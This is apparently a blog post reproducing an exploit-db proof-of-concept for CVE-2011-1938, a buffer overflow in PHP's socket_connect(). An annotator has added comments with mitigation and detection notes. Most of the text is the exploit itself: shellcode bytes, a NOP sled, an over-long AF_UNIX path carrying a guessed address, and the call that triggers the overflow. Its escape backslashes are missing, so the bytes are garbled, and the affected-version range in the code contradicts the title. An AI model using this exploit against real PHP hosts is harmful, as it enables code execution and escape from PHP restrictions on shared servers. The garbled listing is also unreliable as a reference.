PHP inferior ou igual a 5.3.5 socket_connect() Buffer Overflow Vulnerability

25/05/2011 0 Comments

<?php

// Proof-of-concept listing for CVE-2011-1938, reproduced from the exploit-db
// entry linked at the bottom of the page. The CVE concerns socket_connect()
// receiving an over-long pathname for an AF_UNIX socket.
//
// NOTE(review): as printed here the escape backslashes are missing (the
// banner ends in a literal "n", and the byte strings read "x.." rather than
// escape sequences), so this listing is not byte-accurate. Read it as an
// illustration of the bug class, not as a reference artifact.
//
// Defender notes:
//  - The attacker must already be able to run PHP code on the host, so the
//    practical exposure is shared hosting or any setup that relies on
//    PHP-level restrictions to contain untrusted scripts.
//  - Mitigation: run a PHP release newer than the affected range below. If
//    the sockets extension is not needed, do not load it, or list
//    socket_create/socket_connect in disable_functions.
//  - Detection: PHP worker crashes (segfaults) in logs, and scripts passing
//    an AF_UNIX address longer than a socket path can legitimately be
//    (sun_path is typically about 108 bytes on Linux; confirm per platform).
//
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
// NOTE(review): the page title says "5.3.5 or lower", which disagrees with
// the range above; confirm the range against the CVE record before triaging.
echo "[+] CVE-2011-1938";
echo "[+] there we go...n";
// Four-byte value appended to the filler in $b below; the final echo
// ("if you picked the right address") shows the author treats it as a guessed
// memory address, so it is specific to one target build and layout.
define('EVIL_SPACE_ADDR', "xffxffxeexb3");
// Size of the large in-memory buffer built below: 8 * 1024 * 1024.
define('EVIL_SPACE_SIZE', 1024*1024*8);
// Opaque payload bytes supplied by the original author; not decoded in this review.
$SHELLCODE =
"x6ax31x58x99xcdx80x89xc3x89xc1x6ax46x58xcdx80xb0".
"x0bx52x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x89xd1".
"xcdx80";
echo "[+] creating the sled.n";
// Builds a large filler string, then copies the payload into it one character
// at a time, starting at offset EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1.
// $CODE is never passed to any call below; it only sits in the memory of the
// PHP process.
$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
$i < strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}
// Over-long "path": 196 filler characters followed by the guessed address.
// An address of this length reaching socket_connect() is itself the anomaly
// worth alerting on.
$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
// UNIX-domain stream socket. The third argument is the protocol number, and
// the return value is not checked for failure before use.
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)n";
// The call the advisory is about: the over-long string is handed to
// socket_connect() as the AF_UNIX address. Presumably affected builds copy it
// into a fixed-size path buffer without a length check; confirm against the
// upstream fix.
$var85 = socket_connect($var79,$b);

?>

 

fonte: http://www.exploit-db.com/exploits/17318
